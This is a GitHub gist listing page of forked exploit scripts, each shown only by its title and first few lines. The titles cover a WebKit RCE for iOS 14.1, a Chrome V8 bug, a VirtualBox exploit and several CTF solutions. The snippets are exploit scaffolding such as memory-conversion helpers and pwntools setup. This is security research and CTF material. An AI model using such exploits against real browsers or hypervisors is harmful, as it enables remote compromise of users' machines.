ducphanduyagentp
/ fuck.js
Created
September 6, 2021 16:41
— forked from ujin5/fuck.js
WebKit RCE on ios 14.1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function sleep( sleepDuration ){ | |
| var now = new Date().getTime(); | |
| while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } | |
| } | |
| function gc() { | |
| for (let i = 0; i < 0x10; i++) { | |
| new ArrayBuffer(0x1000000); | |
| } | |
| } | |
| let data_view = new DataView(new ArrayBuffer(8)); |
ducphanduyagentp
/ chrome-v8-issue-1126249.js
Created
March 22, 2021 16:47
— forked from hkraw/chrome-v8-issue-1126249.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class Helpers { | |
| constructor() { | |
| this.cvt_buf = new ArrayBuffer(8); | |
| this.cvt_f64a = new Float64Array(this.cvt_buf); | |
| this.cvt_u64a = new BigUint64Array(this.cvt_buf); | |
| this.cvt_u32a = new Uint32Array(this.cvt_buf); | |
| } | |
| ftoi(f) { |
ducphanduyagentp
/ 3_years_of_attacking_javascript_engines.txt
Created
November 3, 2019 03:55
— forked from saelo/3_years_of_attacking_javascript_engines.txt
3 Years of Attacking JavaScript Engines
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| |=-----------------------------------------------------------------------=| | |
| |=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=| | |
| |=-----------------------------------------------------------------------=| | |
| |=------------------------------=[ saelo ]=------------------------------=| | |
| |=-----------------------------------------------------------------------=| | |
| The following are some brief notes about the changes that have taken place | |
| since the release of the "Attacking JavaScript Engines" paper [1]. In | |
| general, no big conceptional changes have happened since. Mitigations have | |
| been added to break some of the presented techniques and, as expected, a |
ducphanduyagentp
/ virtualbox_3d_exp.py
Created
October 18, 2019 19:24
— forked from peternguyen93/virtualbox_3d_exp.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author : peternguyen93 | |
| import sys | |
| sys.path.append('../') # back to vboxlib module | |
| from vboxlib.hgcm import * | |
| from vboxlib.chromium import * | |
| from ctypes import * | |
| ''' |
ducphanduyagentp
/ exploit.html
Created
June 24, 2019 06:00
— forked from ujin5/exploit.html
Google CTF Quals 2019 Monochromatic
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <pre id='log'></pre> | |
| <script src="mojo_bindings.js"></script> | |
| <script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script> | |
| <script src="being_creator_interface.mojom.js"></script> | |
| <script src="food_interface.mojom.js"></script> | |
| <script src="dog_interface.mojom.js"></script> | |
| <script src="person_interface.mojom.js"></script> | |
| <script src="cat_interface.mojom.js"></script> | |
| <script> |
ducphanduyagentp
/ exp.py
Created
May 13, 2019 02:51
— forked from hama7230/exp.py
DEF CON CTF Qualifier 2019 speedrun-012
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
| # context(terminal=['tmux', 'new-window']) # open new window | |
| # libc = ELF('') | |
| elf = ELF('./speedrun-012') | |
| context(os='linux', arch=elf.arch) | |
| context(log_level='debug') # output verbose log |
ducphanduyagentp
/ exploit.c
Created
February 17, 2019 01:12
— forked from sampritipanda/exploit.c
Real World CTF - SCSI Driver Exploitation Challenge
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdint.h> | |
| #include <sys/io.h> | |
| #include <unistd.h> | |
| #include <stdio.h> | |
| #include <fcntl.h> | |
| #include <sys/mman.h> | |
| #include <string.h> | |
| #include <assert.h> | |
| #include "virt_to_phys.c" |
ducphanduyagentp
/ pwn.js
Created
January 10, 2019 08:58
— forked from saelo/pwn.js
Exploit for the "roll a d8" challenge of PlaidCTF 2018
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018. | |
| // N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d | |
| // | |
| // Scroll down do "BEGIN EXPLOIT" to skip the utility functions. | |
| // | |
| // Copyright (c) 2018 Samuel Groß | |
| // | |
| // |
ducphanduyagentp
/ fastbin.c
Created
January 3, 2019 12:36
— forked from HarDToBelieve/fastbin.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #define chunksize 0x8 | |
| #define fakesize 0x20 | |
| #define SIZE_SZ (sizeof(size_t)) | |
| #define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1) | |
| #define MIN_CHUNK_SIZE 24 /* 64 bit system */ | |
| //#define MIN_CHUNK_SIZE 12 /* 32 bit system */ |
ducphanduyagentp
/ gist:5ca684664ab979e2660a0302806edce9
Created
December 31, 2018 10:34
— forked from wmliang/gist:36b3e6a8d59875cc9f2b20a952bb8890
35c3ctf pwndb exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| #-*- coding: utf-8 -*- | |
| from pwn import * | |
| import re | |
| import sys | |
| import string | |
| import itertools | |
| # UAF in IndexCursor |
NewerOlder